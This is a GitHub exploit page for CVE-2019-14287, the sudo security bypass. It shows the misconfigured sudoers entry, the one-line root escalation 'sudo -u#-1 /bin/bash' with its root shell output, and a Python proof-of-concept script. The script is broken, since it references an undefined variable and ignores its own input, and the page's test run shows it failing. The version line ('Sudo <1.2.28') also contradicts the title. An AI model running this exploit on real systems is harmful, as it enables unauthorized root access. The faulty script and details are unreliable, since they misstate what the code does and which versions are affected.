Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287

  • Check for the user sudo permissions
sudo -l 
  • User hacker may run the following commands on kali: (ALL, !root) /bin/bash

  • So user hacker can't run /bin/bash as root (!root)

User hacker sudo privilege in /etc/sudoers

User privilege specification

root    ALL=(ALL:ALL) ALL
hacker ALL=(ALL,!root) /bin/bash

  • With ALL specified, user hacker can run the binary /bin/bash as any user


sudo -u#-1 /bin/bash

Example :

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
  • Description : Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission Proof of Concept Code :

How to use : python3


import os

#Get current username

username = input("Enter current username :")

#check which binary the user can run with sudo

os.system("sudo -l > priv")

os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")


#execute sudo exploit

print("Lets hope it works")

os.system("sudo -u#-1 "+ binary)

  • Testing, it is not working
$ python3
Enter current username :kurec

sh: 1: cannot create priv: Permission denied sh: 1: cannot create binary: Permission denied Lets hope it works usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...

You can’t perform that action at this time.